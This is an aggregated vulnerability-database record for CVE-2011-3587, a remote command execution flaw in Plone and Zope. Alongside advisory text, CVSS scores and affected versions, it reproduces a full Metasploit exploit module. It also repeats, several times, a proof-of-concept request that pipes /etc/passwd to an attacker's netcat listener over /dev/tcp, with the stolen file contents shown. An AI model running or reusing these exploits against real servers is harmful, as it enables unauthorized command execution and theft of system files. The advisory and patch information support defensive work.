ID SAINT:9CF5C6C24AE80412715049E11134256A
Type saint
Reporter SAINT Corporation
Modified 2012-01-13T00:00:00
Description
Added: 01/13/2012
CVE: CVE-2011-3587
BID: 49857
OSVDB: 76105
Background
Plone is a free and open source content management system built on top of the Zope application server. Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites.
Problem
Plone fails to properly sanitize user-supplied input passed to the cmd parameter of the p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2 path. This can be exploited to execute arbitrary shell commands.
Resolution
Upgrade to Plone 2.12.20 or 2.13.10, or apply the Products.Zope_Hotfix_CVE_2011_3587 patch.
References
<http://plone.org/products/plone/security/advisories/20110928>
Limitations
This exploit has been tested against Plone 4.1 on Fedora 13 Linux and Plone 4.0.9 on Ubuntu 10.04 LTS.
Platforms
Windows
Linux
Mac OS X
{"cve": [{"lastseen": "2021-02-02T05:51:06", "description": "Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.", "edition": 4, "cvss3": {}, "published": "2011-10-10T10:55:00", "title": "CVE-2011-3587", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3587"], "modified": "2011-10-21T02:56:00", "cpe": ["cpe:/a:zope:zope:2.13.2", "cpe:/a:zope:zope:2.12.13", "cpe:/a:plone:plone:4.2a1", "cpe:/a:zope:zope:2.12.16", "cpe:/a:zope:zope:2.12.1", "cpe:/a:zope:zope:2.12.4", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:4.0.3", "cpe:/a:zope:zope:2.13.4", "cpe:/a:plone:plone:4.0.4", "cpe:/a:zope:zope:2.12.0", "cpe:/a:zope:zope:2.12.15", "cpe:/a:zope:zope:2.13.7", "cpe:/a:zope:zope:2.12.9", "cpe:/a:zope:zope:2.12.12", "cpe:/a:zope:zope:2.13.0", "cpe:/a:plone:plone:4.2a2", "cpe:/a:zope:zope:2.12.19", "cpe:/a:zope:zope:2.12.11", "cpe:/a:zope:zope:2.12.17", "cpe:/a:plone:plone:4.2", "cpe:/a:plone:plone:4.0.1", "cpe:/a:zope:zope:2.12.20", "cpe:/a:zope:zope:2.12.8", "cpe:/a:zope:zope:2.13.5", "cpe:/a:plone:plone:4.0.8", "cpe:/a:zope:zope:2.12.3", "cpe:/a:zope:zope:2.12.14", "cpe:/a:plone:plone:4.1", "cpe:/a:zope:zope:2.12.5", "cpe:/a:zope:zope:2.12.2", "cpe:/a:zope:zope:2.13.6", 
"cpe:/a:zope:zope:2.13.3", "cpe:/a:zope:zope:2.13.10", "cpe:/a:plone:plone:4.0.9", "cpe:/a:zope:zope:2.12.7", "cpe:/a:zope:zope:2.13.9", "cpe:/a:zope:zope:2.12.18", "cpe:/a:zope:zope:2.13.8", "cpe:/a:zope:zope:2.13.1", "cpe:/a:plone:plone:4.0.6.1", "cpe:/a:zope:zope:2.12.10", "cpe:/a:zope:zope:2.12.6"], "id": "CVE-2011-3587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3587", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:plone:plone:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.8:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.16:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a4:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b3:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b2:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.20:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a3:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.15:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.5:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.5:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.12:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.6:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:b1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a3:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.18:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.13:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.9:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.9:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:c1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.14:*:*:*:*:*:*:*", 
"cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a2:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b4:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a2:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.8:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.10:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a4:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.17:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.6:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.19:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.2a2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.7:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.2a1:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.3:*:*:*:*:*:*:*"]}], "d2": [{"lastseen": "2019-05-29T19:19:04", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "**Name**| d2sec_zopeplone \n---|--- \n**CVE**| CVE-2011-3587 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Zope/Plone Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2011-10-10T10:55:00", "published": "2011-10-10T10:55:00", "id": "D2SEC_ZOPEPLONE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_zopeplone", "title": "DSquare Exploit Pack: D2SEC_ZOPEPLONE", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "**Name**| plone \n---|--- \n**CVE**| 
CVE-2011-3587 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Plone Zope Remote Command Execution \n**Notes**| CVE Name: CVE-2011-3587 \nNotes: \n \nVulnerable versions include: \nPlone 4.0 (through 4.0.9); Plone 4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x. \n \n \nRepeatability: Infinite \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587 \n\n", "edition": 2, "modified": "2011-10-10T10:55:00", "published": "2011-10-10T10:55:00", "id": "PLONE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/plone", "title": "Immunity Canvas: PLONE", "type": "canvas", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "Added: 01/13/2012 \nCVE: [CVE-2011-3587](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587>) \nBID: [49857](<http://www.securityfocus.com/bid/49857>) \nOSVDB: [76105](<http://www.osvdb.org/76105>) \n\n\n### Background\n\nPlone is a free and open source content management system built on top of the Zope application server. Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites. \n\n### Problem\n\nPlone fails to properly sanitize user-supplied input passed to cmd parameter in p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2. This can be exploited to execute arbitrary shell commands. \n\n### Resolution\n\nUpgrade to Plone 2.12.20 or 2.13.10 or apply patch Products.Zope_Hotfix_CVE_2011_3587. \n\n### References\n\n<http://plone.org/products/plone/security/advisories/20110928> \n\n\n### Limitations\n\nThis exploit has been tested against Plone 4.1 on Fedora 13 Linux and Plone 4.0.9 on Ubuntu 10.04 LTS. 
\n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "edition": 4, "modified": "2012-01-13T00:00:00", "published": "2012-01-13T00:00:00", "id": "SAINT:C999148B18225353D8171CA71E6C7429", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/plone_zope_saxutils_cmd_exec", "title": "Plone Zope SAXutils Command Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "Added: 01/13/2012 \nCVE: [CVE-2011-3587](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587>) \nBID: [49857](<http://www.securityfocus.com/bid/49857>) \nOSVDB: [76105](<http://www.osvdb.org/76105>) \n\n\n### Background\n\nPlone is a free and open source content management system built on top of the Zope application server. Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites. \n\n### Problem\n\nPlone fails to properly sanitize user-supplied input passed to cmd parameter in p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2. This can be exploited to execute arbitrary shell commands. \n\n### Resolution\n\nUpgrade to Plone 2.12.20 or 2.13.10 or apply patch Products.Zope_Hotfix_CVE_2011_3587. \n\n### References\n\n<http://plone.org/products/plone/security/advisories/20110928> \n\n\n### Limitations\n\nThis exploit has been tested against Plone 4.1 on Fedora 13 Linux and Plone 4.0.9 on Ubuntu 10.04 LTS. 
\n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "edition": 1, "modified": "2012-01-13T00:00:00", "published": "2012-01-13T00:00:00", "id": "SAINT:72DF8F5D53D254B727E1892FBA9144EA", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/plone_zope_saxutils_cmd_exec", "type": "saint", "title": "Plone Zope SAXutils Command Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:26", "description": "", "published": "2011-12-28T00:00:00", "type": "packetstorm", "title": "Plone and Zope Remote CMD Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-28T00:00:00", "id": "PACKETSTORM:108200", "href": "https://packetstormsecurity.com/files/108200/Plone-and-Zope-Remote-CMD-Injection-Exploit.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Plone and Zope Remote CMD Injection Exploit', \n'Description' => %q{ \nUnspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x \nthrough 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute \narbitrary commands via vectors related to the p_ class in OFS/misc_.py and \nthe use of Python modules. 
\n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Plone Security team', # Vulnerability discovery \n'Nick Miles', # Original exploit \n'TecR0c' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2011-3587'], \n['URL', 'http://www.exploit-db.com/exploits/18262/'], \n['URL', 'http://plone.org/products/plone/security/advisories/20110928'] \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic telnet perl ruby', \n} \n}, \n'Platform' => ['unix', 'linux'], \n'Arch' => ARCH_CMD, \n'Targets' => [['Automatic',{}]], \n'DisclosureDate' => 'Oct 04 2011', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('URI',[true, \"The path to the Plone installation\", \"/\"]), \n],self.class) \nregister_autofilter_ports([ 8080 ]) \nend \n \ndef check \nuri = datastore['URI'] \nuri << '/' if uri[-1,1] != '/' \nuri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' \n \nres = send_request_raw( \n{ \n'uri' => uri \n}, 25) \nif (res.headers['Bobo-Exception-Type'] =~ /zExceptions.BadRequest/) \nreturn Exploit::CheckCode::Vulnerable \nend \n# patched == zExceptions.NotFound \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nuri = datastore['URI'] \nuri << '/' if uri[-1,1] != '/' \nuri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' \n \nsend_request_cgi( \n{ \n'method' => 'POST', \n'uri' => uri, \n'vars_post' => \n{ \n'cmd' => payload.encoded, \n} \n}, 0.5) # short timeout, we don't care about the response \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108200/plone_popen2.rb.txt"}, {"lastseen": "2016-12-05T22:20:44", "description": "", "published": "2011-12-21T00:00:00", "type": "packetstorm", "title": "Plone / Zope Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": 
"2011-12-21T00:00:00", "id": "PACKETSTORM:108071", "href": "https://packetstormsecurity.com/files/108071/Plone-Zope-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: Plone - Remote Command Execution \n# Date: 12/21/2011 \n# Author: Nick Miles (www.npenetrable.com) \n# Tested on: 12/21/2011 \n# CVE : CVE-2011-3587 \n \nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone \n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x. \nVersions Not Affected: Versions of Plone that use Zope other than Zope \n2.12.x and Zope 2.13.x. \n \nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928 \n \nYou can execute any command on the remote Plone server with the \nfollowing request \nif the server is Unix/Linux based (Note: you won't get returned the \nresults of the command): \n \nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command \nto run> \n \nExample: \n \nListen for a connection: \n$ nc -l 4040 \n \nOn victim, visit: \nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040 \n \nResponse: \n$ nc -l 4040 \nroot:x:0:0:root:/root:/bin/bash \nbin:x:1:1:bin:/bin:/sbin/nologin \ndaemon:x:2:2:daemon:/sbin:/sbin/nologin \nadm:x:3:4:adm:/var/adm:/sbin/nologin \nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin \nsync:x:5:0:sync:/sbin:/bin/sync \nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown \nhalt:x:7:0:halt:/sbin:/sbin/halt \nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin \nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin \noperator:x:11:0:operator:/root:/sbin/nologin \ngames:x:12:100:games:/usr/games:/sbin/nologin \ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin \nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin \nnobody:x:99:99:Nobody:/:/sbin/nologin \nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin \nsaslauth:x:499:499:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin 
\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin \nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin \nntp:x:38:38::/etc/ntp:/sbin/nologin \ntcpdump:x:72:72::/:/sbin/nologin \napache:x:48:48:Apache:/var/www:/sbin/nologin \nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash \nplone:x:500:500::/home/plone:/bin/false \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108071/plonezope-exec.txt"}], "exploitdb": [{"lastseen": "2016-02-02T09:26:53", "description": "Plone and Zope Remote Command Execution PoC. CVE-2011-3587. Webapps exploits for multiple platform", "published": "2011-12-21T00:00:00", "type": "exploitdb", "title": "Plone and Zope Remote Command Execution PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-21T00:00:00", "id": "EDB-ID:18262", "href": "https://www.exploit-db.com/exploits/18262/", "sourceData": "# Exploit Title: Plone - Remote Command Execution\r\n# Date: 12/21/2011\r\n# Author: Nick Miles (www.npenetrable.com)\r\n# Tested on: 12/21/2011\r\n# CVE : CVE-2011-3587\r\n\r\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\r\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\r\nVersions Not Affected: Versions of Plone that use Zope other than Zope\r\n2.12.x and Zope 2.13.x.\r\n\r\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\r\n\r\nYou can execute any command on the remote Plone server with the\r\nfollowing request\r\nif the server is Unix/Linux based (Note: you won't get returned the\r\nresults of the command):\r\n\r\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\r\nto run>\r\n\r\nExample:\r\n\r\nListen for a connection:\r\n$ nc -l 4040\r\n\r\nOn victim, 
visit:\r\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\r\n\r\nResponse:\r\n$ nc -l 4040\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\r\nhalt:x:7:0:halt:/sbin:/sbin/halt\r\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\r\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\r\noperator:x:11:0:operator:/root:/sbin/nologin\r\ngames:x:12:100:games:/usr/games:/sbin/nologin\r\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\r\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\r\nnobody:x:99:99:Nobody:/:/sbin/nologin\r\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\r\nsaslauth:x:499:499:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin\r\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\r\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\r\nntp:x:38:38::/etc/ntp:/sbin/nologin\r\ntcpdump:x:72:72::/:/sbin/nologin\r\napache:x:48:48:Apache:/var/www:/sbin/nologin\r\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\r\nplone:x:500:500::/home/plone:/bin/false\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18262/"}], "seebug": [{"lastseen": "2017-11-19T17:56:19", "description": "BUGTRAQ ID: 49857\r\nCVE ID: 
CVE-2011-3587\r\n\r\nZope\u662f\u4e00\u4e2a\u5f00\u6e90\u7684web\u5e94\u7528\u670d\u52a1\u5668\uff0c\u4e3b\u8981\u7528python\u5199\u6210\r\n\r\n\r\nZope\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u975e\u6cd5\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u90e8\u7f72\u7279\u5236\u7684Web\u8bf7\u6c42\u5e76\u4ee5Zope/Plone\u670d\u52a1\u6743\u9650\u6267\u884c\u4efb\u610f\u547d\u4ee4\n0\nZope 2.13.9\r\nZope 2.13.8\r\nZope 2.13\r\nZope 2.12.19\r\nZope 2.12\r\nPlone 4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nZope\r\n----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.zope.org/", "published": "2011-12-26T00:00:00", "type": "seebug", "title": "Zope\u6846\u67b6"cmd"\u53c2\u6570\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26110", "id": "SSV:26110", "sourceData": "\n # Exploit Title: Plone - Remote Command Execution\r\n# Date: 12/21/2011\r\n# Author: Nick Miles (www.npenetrable.com)\r\n# Tested on: 12/21/2011\r\n# CVE : CVE-2011-3587\r\n\r\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\r\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\r\nVersions Not Affected: Versions of Plone that use Zope other than Zope\r\n2.12.x and Zope 2.13.x.\r\n\r\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\r\n\r\nYou can execute any command on the remote Plone server with the\r\nfollowing request\r\nif the server is Unix/Linux based (Note: you won't get returned the\r\nresults of the command):\r\n\r\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\r\nto run>\r\n\r\nExample:\r\n\r\nListen for a connection:\r\n$ nc -l 4040\r\n\r\nOn 
victim, visit:\r\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\r\n\r\nResponse:\r\n$ nc -l 4040\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\r\nhalt:x:7:0:halt:/sbin:/sbin/halt\r\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\r\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\r\noperator:x:11:0:operator:/root:/sbin/nologin\r\ngames:x:12:100:games:/usr/games:/sbin/nologin\r\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\r\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\r\nnobody:x:99:99:Nobody:/:/sbin/nologin\r\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\r\nsaslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\r\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\r\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\r\nntp:x:38:38::/etc/ntp:/sbin/nologin\r\ntcpdump:x:72:72::/:/sbin/nologin\r\napache:x:48:48:Apache:/var/www:/sbin/nologin\r\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\r\nplone:x:500:500::/home/plone:/bin/false\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26110", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T18:29:36", "description": "BUGTRAQ ID: 49857\r\nCVE ID: 
CVE-2011-3587\r\n\r\nZope\u662f\u4e00\u4e2a\u5f00\u6e90\u7684web\u5e94\u7528\u670d\u52a1\u5668\uff0c\u4e3b\u8981\u7528python\u5199\u6210\r\n\r\n\r\nZope\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u975e\u6cd5\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u90e8\u7f72\u7279\u5236\u7684Web\u8bf7\u6c42\u5e76\u4ee5Zope/Plone\u670d\u52a1\u6743\u9650\u6267\u884c\u4efb\u610f\u547d\u4ee4\r\n0\r\nZope 2.13.9\r\nZope 2.13.8\r\nZope 2.13\r\nZope 2.12.19\r\nZope 2.12\r\nPlone 4.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nZope\r\n----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.zope.org/", "published": "2014-07-01T00:00:00", "title": "Plone and Zope Remote Command Execution PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72431", "id": "SSV:72431", "sourceData": "\n # Exploit Title: Plone - Remote Command Execution\r\n# Date: 12/21/2011\r\n# Author: Nick Miles (www.npenetrable.com)\r\n# Tested on: 12/21/2011\r\n# CVE : CVE-2011-3587\r\n\r\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\r\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\r\nVersions Not Affected: Versions of Plone that use Zope other than Zope\r\n2.12.x and Zope 2.13.x.\r\n\r\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\r\n\r\nYou can execute any command on the remote Plone server with the\r\nfollowing request\r\nif the server is Unix/Linux based (Note: you won't get returned the\r\nresults of the command):\r\n\r\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\r\nto run>\r\n\r\nExample:\r\n\r\nListen for a connection:\r\n$ nc -l 